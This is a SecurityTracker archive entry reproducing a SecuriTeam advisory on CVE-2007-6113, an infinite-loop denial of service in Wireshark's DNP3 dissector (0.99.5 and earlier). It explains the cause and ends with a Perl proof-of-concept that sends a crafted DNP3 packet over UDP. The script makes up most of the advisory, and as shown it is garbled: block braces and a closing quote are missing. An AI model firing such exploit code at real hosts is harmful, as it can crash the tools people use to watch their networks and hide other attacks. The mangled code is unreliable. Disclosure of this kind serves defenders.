SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Wireshark (Ethereal) Vendors:  Wireshark.org
Wireshark DNP3 Dissector Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1018635
SecurityTracker URL:  http://securitytracker.com/id?1018635
CVE Reference:  CVE-2007-6113   (Links to External Site)
Updated:  Apr 1 2008
Original Entry Date:  Aug 30 2007
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 0.99.5 and prior versions
Description:  A vulnerability was reported in Wireshark. A remote user can cause denial of service conditions.

A remote user can send specially crafted DNP3 data to cause the target service to enter an infinite loop.

The original advisory is available at:

http://www.securiteam.com/securitynews/5LP0V00MAI.html

beSTORM reported this vulnerability (www.beyondsecurity.com/bestorm_overview.html).
Impact:  A remote user can cause Wireshark to enter an infinite loop.
Solution:  Version 0.99.6 is not vulnerable.

[Editor's note: The Wireshark advisory for version 0.99.6 does not reference the DNP3 dissector.]
Vendor URL:  www.wireshark.org/ (Links to External Site)
Cause:  State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  SecuriTeam <support@securiteam.com>
Message History:   None.

 Source Message Contents
Date:  30 Aug 2007 08:51:52 +0200
From:  SecuriTeam <support@securiteam.com>
Subject:  [NEWS] Wireshark DNP3 Dissector Infinite Loop Vulnerability

 
The following security advisory is sent to the securiteam mailing list, and can be found at the Secur
iTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Wireshark DNP3 Dissector Infinite Loop Vulnerability
------------------------------------------------------------------------


SUMMARY

A vulnerability in Wireshark's DNP3 dissector allows attackers to cause it 
to enter an infinite loop which in turn can be used to mask other types of 
attacks from being captured by Wireshark.

DETAILS

Vulnerable Systems:
 * Wireshark version 0.99.5 and prior

Immune Systems:
 * Wireshark version 0.99.6 and newer

A vulnerability in the way Wireshark handles DNP3 data allows an attacker 
to fool the dissector into thinking a negative value of items has been 
provided to it as part of the Application Layer's request to read/write 
objects. This in turn causes the loop found in the code:
for (temp16 = 0; temp16 < num_items; temp16++)
 

To enter into an infinite loop as the temp16 parameter is defined as an 
unsigned int of a length of 16 bits while the num_items is defined as an 
unsigned int of a length of 32 bits - which in turn means than a negative 
value will be casted into a larger than 16 bits value - as the temp16 will 
not be able to reach the value stored in the num_items parameter.

Proof of Concept:
The vulnerability can be recreated by either using  
<http://www.beyondsecurity.com/bestorm_overview.html> beSTORM with the 
DNP3 protocol fuzzer and monitoring the traffic generated with Wireshark 
or by launching the following exploit code:
#!/usr/bin/perl
# Automatically generated by beSTORM(tm)
# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)

# Attack vector:
# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0

# Module:
#  DNP3

use strict;
use warnings;

use Getopt::Std;
use IO::Socket::INET;

$SIG{INT}  = \&abort;

my $host  = '192.168.4.52';
my $port  = 20000;
my $proto = 'udp';
my $sockType = SOCK_DGRAM;
my $timeout = 1;

#Read command line arguments
my %opt;
my $opt_string = 'hH:P:t:';
getopts( "$opt_string", \%opt );

if (defined $opt{h}) {
    usage()
 

$host    = $opt{H} ? $opt{H} : $host;
$port    = $opt{P} ? $opt{P} : $port;
$timeout = $opt{t} ? $opt{t} : $timeout;

my @commands = (
{Command => 'Send',
 Data => 
"\xC3\xC0\x01\x01\x00\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08},
{Command => 'Receive'},

);

###
# End user configurable part
###

#1. Create a new connection
my $sock = new IO::Socket::INET (
                PeerAddr => $host,
    PeerPort => $port,
    Proto => $proto,
                Type => $sockType,
                Timeout => $timeout,
            )
    or die "socket error: $!\n\n";

print "connected to: $host:$port\n";

$sock->autoflush(1);
binmode $sock;

#2. communication part

foreach my $command (@commands)
 
    if ($command->{'Command'} eq 'Receive')
    {
        my $buf = receive($sock, $timeout);
        if (length $buf)
        {
            print "received: [$buf]\n";
        }
    }
    elsif ($command->{'Command'} eq 'Send')
    {
        print "sending: [".$command->{'Data'}."]\n";
        send ($sock, $command->{'Data'}, 0) or die "send failed, reason: 
$!\n";
    }
 

#3. Close connection
close ($sock);

#The end

sub receive
 
 my $sock = shift;
 my $timeout = shift;

 my $tmpbuf;
 my $buf = "";

 while(1)
 { # Example from perldoc -f alarm
  eval {
    local $SIG{ALRM} = sub { die "timeout\n" };
    alarm $timeout;

    my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time.
    if ( !defined $ret or $ret == 0 )
    { #EOF
        die "timeout\n";
    }

    alarm 0;
    $buf .= $tmpbuf;
  };
  if ($@) { #time out
    if($@ eq "timeout\n")
    {
        last;
    }
    else {
        die "receive aborted\n";
    }
  }
 } #while
 return $buf;
 

sub abort
 
    print "aborting...\n";
    if ($sock)
    {
        close $sock;
    }
    die "User aborted operation\n";
 
sub usage
 
 print "usage: $0 [-hHPt]\n";
 print "-h\t: this help message\n";
 print "-H\t: override default host - $host\n";
 print "-P\t: override default port - $port\n";
 print "-t\t: set socket timeout in seconds\n";
 exit 0;
 


ADDITIONAL INFORMATION

The information has been provided by beSTORM.
The original article can be found at:  
<http://www.beyondsecurity.com/bestorm_overview.html> 
http://www.beyondsecurity.com/bestorm_overview.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@secu
riteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.co
m 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, con
sequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC